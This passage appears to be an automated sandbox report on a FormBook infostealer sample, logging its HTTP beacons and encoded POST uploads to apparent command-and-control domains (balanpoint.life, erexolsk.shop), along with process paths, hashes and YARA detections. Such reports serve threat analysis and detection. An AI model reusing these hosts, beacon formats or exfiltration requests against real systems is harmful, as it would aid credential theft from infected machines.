Dec 11, 2024 04:52:16.584924936 CET	533	IN	HTTP/1.1 404 Not Found Date: Wed, 11 Dec 2024 03:52:16 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49987	209.74.79.40	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:52:18.026133060 CET	10914	OUT	POST /0cbv/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.balanpoint.life Origin: http://www.balanpoint.life Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10304 Referer: http://www.balanpoint.life/0cbv/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee) Data Raw: 67 6e 6c 78 44 78 74 3d 34 6e 4b 52 68 77 72 6a 6d 2b 5a 6f 36 46 30 56 42 6a 56 42 44 6d 46 55 52 48 33 39 30 66 64 54 4e 61 66 38 45 72 2b 30 4f 49 58 73 54 7a 4e 39 6d 62 4f 38 47 4b 49 49 51 50 6f 38 48 55 36 4a 69 32 68 6a 63 61 47 34 78 4f 4d 52 76 79 64 68 4a 6e 4a 42 42 71 62 75 2f 54 30 54 41 72 75 62 7a 68 42 6e 38 6c 6d 59 58 68 50 75 76 4b 44 48 6a 31 43 74 46 2f 66 56 7a 4b 33 77 31 62 6c 6d 32 76 49 65 74 34 49 59 33 58 51 55 79 69 30 72 48 64 79 59 4b 38 4a 4e 4c 6f 64 5a 70 4d 6a 77 56 30 51 75 5a 4d 2b 48 73 53 37 61 45 55 75 4d 5a 75 76 68 4d 62 51 4b 72 6a 38 36 50 62 72 62 44 54 52 62 54 47 4f 75 65 2b 73 59 68 68 79 34 63 6e 6c 66 33 61 72 31 76 73 5a 79 6e 49 47 2b 41 7a 63 59 44 76 79 52 61 44 46 56 33 68 44 2f 4f 32 4a 43 6c 69 47 44 34 35 61 49 74 72 6d 39 65 79 73 2f 6a 62 5a 2b 6c 68 52 45 38 6b 36 6c 48 71 2b 43 66 68 73 31 59 51 30 55 77 4a 6d 4c 76 4d 4d 47 31 59 7a 48 5a 47 41 6d 69 34 56 6b 64 36 61 59 63 48 67 2b 67 34 59 4a 4d 39 56 4c 69 70 4c 35 52 78 38 6d 6e 46 [TRUNCATED] Data Ascii: gnlxDxt=4nKRhwrjm+Zo6F0VBjVBDmFURH390fdTNaf8Er+0OIXsTzN9mbO8GKIIQPo8HU6Ji2hjcaG4xOMRvydhJnJBBqbu/T0TArubzhBn8lmYXhPuvKDHj1CtF/fVzK3w1blm2vIet4IY3XQUyi0rHdyYK8JNLodZpMjwV0QuZM+HsS7aEUuMZuvhMbQKrj86PbrbDTRbTGOue+sYhhy4cnlf3ar1vsZynIG+AzcYDvyRaDFV3hD/O2JCliGD45aItrm9eys/jbZ+lhRE8k6lHq+Cfhs1YQ0UwJmLvMMG1YzHZGAmi4Vkd6aYcHg+g4YJM9VLipL5Rx8mnFsL8ffh0BH7FhPcUK212NXP6iHNqouCbVZshgO5foDq+l5rHqVm5NHODoEBxEw67TUjGrS+eBZWZGdSvKIOu+96mNocoueRn0c49DTRcvaFVEBIvD0018zB+Uojfm4MGsZhf7znSWiPXV7ytG8aBCZ+d4mokCasFIaXnwY60YF2OaNsohoriN8DRX77/Gp5SgltuLNukhzVFWK0QxmGYNG7LhzHeZVDOKBEHh+cBLNqIhSi9RQ+SLm1Sij+fhp1PTtCHWlIwwouqCxaTnsampv6DamOZpMAhlJuIfm7iAKtzGQ53jYRmYYqSGe5pgl7IbbYA9cuWeWrjDGMQPf8eMC/4V1QPzfnSgEaRGLjoOctaRO7VQu5JFb1ue9CJXXnDDGySBv0AOWfSIjJHSnD7Hh8IA38R2KdTECyYrG31yO1aHrF58pQRzg2D0lG1WCHiL4LdPofpsvPZDzd4irJd2kF3PiM1K6ITGwvSrwSeKe29MQ0ue647Ug6k4uJCdMAfBt7X/dAbPwdQ/TrwKgMMZK9wD42/83ATr4RXOpQmMh9VqBL4xeXP0vtrYDFX03d6TW1OPCLPeJOY6CC68FxIf3xgUKeh0Vb5nfXOUwZn1DS7T7+KZ5te3Ex0VqSkik1vC6dhoLbH4CbpXexD+cSiIXIfLyLtOccFb8o [TRUNCATED]
Dec 11, 2024 04:52:19.304116964 CET	533	IN	HTTP/1.1 404 Not Found Date: Wed, 11 Dec 2024 03:52:19 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49993	209.74.79.40	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:52:20.678031921 CET	541	OUT	GET /0cbv/?Cpbp2=zjh46zEHi&gnlxDxt=1lixiFn2nPh88HonPghJDFAFcnnzyrdvNvLcEc2wPpGyfhd+75GCEpQKEfA1MXagijVYaOCU2MEqrz5pMxxhEIji4Qs6Ro2dwyRTrjDFXU7ZlJam3DSGN9g= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.balanpoint.life Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
Dec 11, 2024 04:52:21.917340994 CET	548	IN	HTTP/1.1 404 Not Found Date: Wed, 11 Dec 2024 03:52:21 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	50014	13.228.81.39	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:52:27.769006014 CET	806	OUT	POST /jh0k/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.erexolsk.shop Origin: http://www.erexolsk.shop Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 204 Referer: http://www.erexolsk.shop/jh0k/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee) Data Raw: 67 6e 6c 78 44 78 74 3d 52 47 57 43 7a 72 73 4f 6a 4a 32 74 2f 74 4a 53 74 68 73 35 41 74 4d 49 67 52 72 6f 69 57 56 6d 31 74 79 64 32 32 39 78 2b 37 54 51 4e 72 70 64 76 48 70 70 7a 62 54 6b 47 37 39 4a 56 68 4c 77 30 2b 43 66 59 4f 68 52 66 4e 73 73 39 61 73 55 39 79 64 77 34 5a 6c 70 56 55 61 34 45 2b 69 52 66 44 79 70 6c 2f 59 32 62 49 53 70 42 51 77 61 49 38 2b 6b 54 4c 37 4f 4d 54 5a 50 34 2b 30 4d 58 51 51 69 38 50 6a 4c 4e 4d 65 2b 33 34 47 6e 4e 6a 67 2f 4e 2b 4b 69 56 68 50 61 4d 69 79 44 59 2f 41 47 65 58 48 50 2b 47 57 70 55 51 67 4b 54 4c 33 4a 49 67 45 55 6d 73 48 58 5a 72 34 76 6e 77 3d 3d Data Ascii: gnlxDxt=RGWCzrsOjJ2t/tJSths5AtMIgRroiWVm1tyd229x+7TQNrpdvHppzbTkG79JVhLw0+CfYOhRfNss9asU9ydw4ZlpVUa4E+iRfDypl/Y2bISpBQwaI8+kTL7OMTZP4+0MXQQi8PjLNMe+34GnNjg/N+KiVhPaMiyDY/AGeXHP+GWpUQgKTL3JIgEUmsHXZr4vnw==
Dec 11, 2024 04:52:29.341694117 CET	364	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Wed, 11 Dec 2024 03:52:29 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.erexolsk.shop/jh0k/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50020	13.228.81.39	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:52:30.431706905 CET	826	OUT	POST /jh0k/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.erexolsk.shop Origin: http://www.erexolsk.shop Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 224 Referer: http://www.erexolsk.shop/jh0k/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee) Data Raw: 67 6e 6c 78 44 78 74 3d 52 47 57 43 7a 72 73 4f 6a 4a 32 74 38 4f 52 53 71 47 59 35 56 64 4d 4c 38 42 72 6f 6f 32 56 69 31 74 2b 64 32 7a 4e 68 2b 4e 6a 51 4e 4b 5a 64 2b 32 70 70 79 62 54 6b 4f 62 38 69 4b 78 4c 6e 30 2b 50 69 59 4c 5a 52 66 4d 49 73 39 61 63 55 39 46 4a 7a 34 4a 6c 72 64 30 61 74 41 2b 69 52 66 44 79 70 6c 2f 63 49 62 49 4b 70 42 6a 6f 61 61 4e 2b 6c 4e 37 37 52 4c 54 5a 50 38 2b 31 48 58 51 51 36 38 4f 75 75 4e 4a 43 2b 33 35 32 6e 4e 77 34 34 44 2b 4b 6b 4b 52 4f 78 43 79 54 4a 63 75 6c 6f 58 6b 44 4f 35 48 57 50 56 57 74 51 43 36 57 65 61 67 67 6e 37 72 4f 6a 55 6f 46 6d 38 30 2f 4f 45 54 74 48 34 6e 35 79 5a 71 4c 46 4d 4c 50 42 51 66 55 3d Data Ascii: gnlxDxt=RGWCzrsOjJ2t8ORSqGY5VdML8Broo2Vi1t+d2zNh+NjQNKZd+2ppybTkOb8iKxLn0+PiYLZRfMIs9acU9FJz4Jlrd0atA+iRfDypl/cIbIKpBjoaaN+lN77RLTZP8+1HXQQ68OuuNJC+352nNw44D+KkKROxCyTJculoXkDO5HWPVWtQC6Weaggn7rOjUoFm80/OETtH4n5yZqLFMLPBQfU=
Dec 11, 2024 04:52:32.004187107 CET	364	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Wed, 11 Dec 2024 03:52:31 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.erexolsk.shop/jh0k/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	50026	13.228.81.39	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:52:33.095495939 CET	10908	OUT	POST /jh0k/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Host: www.erexolsk.shop Origin: http://www.erexolsk.shop Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10304 Referer: http://www.erexolsk.shop/jh0k/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee) Data Raw: 67 6e 6c 78 44 78 74 3d 52 47 57 43 7a 72 73 4f 6a 4a 32 74 38 4f 52 53 71 47 59 35 56 64 4d 4c 38 42 72 6f 6f 32 56 69 31 74 2b 64 32 7a 4e 68 2b 4f 44 51 4e 5a 42 64 76 68 56 70 31 62 54 6b 50 62 38 68 4b 78 4c 36 30 39 2f 75 59 4c 6c 72 66 50 67 73 39 35 55 55 37 33 78 7a 74 35 6c 72 43 6b 62 4b 45 2b 69 68 66 44 69 6c 6c 2f 73 49 62 49 4b 70 42 6c 45 61 4b 4d 2b 6c 50 37 37 4f 4d 54 5a 31 34 2b 31 76 58 54 67 45 38 4f 71 51 4e 61 61 2b 77 61 4f 6e 42 6a 63 34 4c 2b 4b 6d 4c 52 4f 70 43 79 66 4b 63 75 35 4f 58 6e 65 72 35 48 69 50 58 67 68 54 62 70 65 36 4c 32 67 57 67 38 75 2f 59 6f 4e 4e 7a 57 7a 51 4e 77 39 48 73 30 39 4f 54 4b 75 55 57 6f 6e 42 4f 70 36 50 6d 79 2b 51 7a 64 2b 6f 50 62 65 43 43 2b 35 2b 38 52 7a 79 2b 32 6c 4c 33 54 6a 4a 61 54 79 6f 4d 4e 4f 65 32 79 6d 42 4d 30 6a 47 63 37 4c 56 61 5a 50 51 50 4d 6a 69 48 55 4b 74 6f 65 63 47 51 41 62 6f 66 45 52 53 49 64 4a 65 64 52 41 79 61 51 41 71 53 59 2b 6e 2b 35 64 4a 4a 54 6b 6f 2b 76 73 6b 63 62 42 52 55 6a 4e 37 53 66 6a 72 48 77 [TRUNCATED] Data Ascii: gnlxDxt=RGWCzrsOjJ2t8ORSqGY5VdML8Broo2Vi1t+d2zNh+ODQNZBdvhVp1bTkPb8hKxL609/uYLlrfPgs95UU73xzt5lrCkbKE+ihfDill/sIbIKpBlEaKM+lP77OMTZ14+1vXTgE8OqQNaa+waOnBjc4L+KmLROpCyfKcu5OXner5HiPXghTbpe6L2gWg8u/YoNNzWzQNw9Hs09OTKuUWonBOp6Pmy+Qzd+oPbeCC+5+8Rzy+2lL3TjJaTyoMNOe2ymBM0jGc7LVaZPQPMjiHUKtoecGQAbofERSIdJedRAyaQAqSY+n+5dJJTko+vskcbBRUjN7SfjrHw/BN3glMfyVw1EA44+ZqlSqFUmx0K4rjjghF5/dzSVh9fIH26rcgFq9LCQHC8hT/9HfFDQLZ+gy1Bo6gIpbuR32xQcABB8dywilpxt2rk0iV1sTI0St9FTa1rj7/vaj0rBNEuArpobfd3h5flxoT03aNgkhD1dMaRGNQoM3H8kpoyQET05WCsft6TbSeJxVneXIzd87GUhocD/69w+1V84/qIN9kIb6b1jvV+F3TZISCet98R0RtQ7qQoC2o6CviNGMiqC9NPQdihVyKSS7qYb3mGIf7cgqMoWGpHFfEsGM4T9bMNhgrwO3f3XlCnoahb4WT8KM2N7jMGyw/y7/QOZYnd0APaDYhM1GIZu45JsoTZRiaNtU7OHybS3JQ0PrwlKyum3YQAleXLQjnQNbvE5Qhrk+EDAEN0FCmQULMh6DNgLQrtvLeIHMqgSs3/KZEciNuUlZbEXmleeUK8w75YMdHeVWcYtsPCvMwsTLwf/pk7aut+dByQi61Yzr9soxI1JGECN0zRDoTQGpW8Auk9VQxFiOlerWyOmVnzmbo57qv1spdate4FNjTOeX3EaeilFon1de5aZ2m9iBuN9GQF12xw0vOWznxAJZxxXl0g2Ysj3jcToiXUiKJ+wkGowhlECFw+GQNgonqdbj08Rx+dY7KoF6vpJ+RGuw [TRUNCATED]
Dec 11, 2024 04:52:34.676851988 CET	364	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Wed, 11 Dec 2024 03:52:34 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.erexolsk.shop/jh0k/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	50031	13.228.81.39	80	5904	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe

Timestamp	Bytes transferred	Direction	Data
Dec 11, 2024 04:52:35.753976107 CET	539	OUT	GET /jh0k/?gnlxDxt=cE+iwc0yj830uuhklCcrX/wOzR3WnF1m5/XKwWZdu8qZVYJFuXJD1Zapdap+RxDw3ImSWqBjcd0u94ZA4St+7Z5LUmDNQvXJfTb2ufMRWduIOzpab4DfT5A=&Cpbp2=zjh46zEHi HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.erexolsk.shop Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
Dec 11, 2024 04:52:37.334223032 CET	509	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Wed, 11 Dec 2024 03:52:37 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.erexolsk.shop/jh0k/?gnlxDxt=cE+iwc0yj830uuhklCcrX/wOzR3WnF1m5/XKwWZdu8qZVYJFuXJD1Zapdap+RxDw3ImSWqBjcd0u94ZA4St+7Z5LUmDNQvXJfTb2ufMRWduIOzpab4DfT5A=&Cpbp2=zjh46zEHi Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Target ID:	0
Start time:	22:49:35
Start date:	10/12/2024
Path:	C:\Users\user\Desktop\CJE003889.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\CJE003889.exe"
Imagebase:	0xc60000
File size:	1'229'312 bytes
MD5 hash:	701F58C31461426D9DD6FAFCD8ADCD33
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	22:49:38
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\CJE003889.exe"
Imagebase:	0xce0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2149646425.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2142478185.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2150676929.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	22:50:17
Start date:	10/12/2024
Path:	C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe"
Imagebase:	0xd00000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
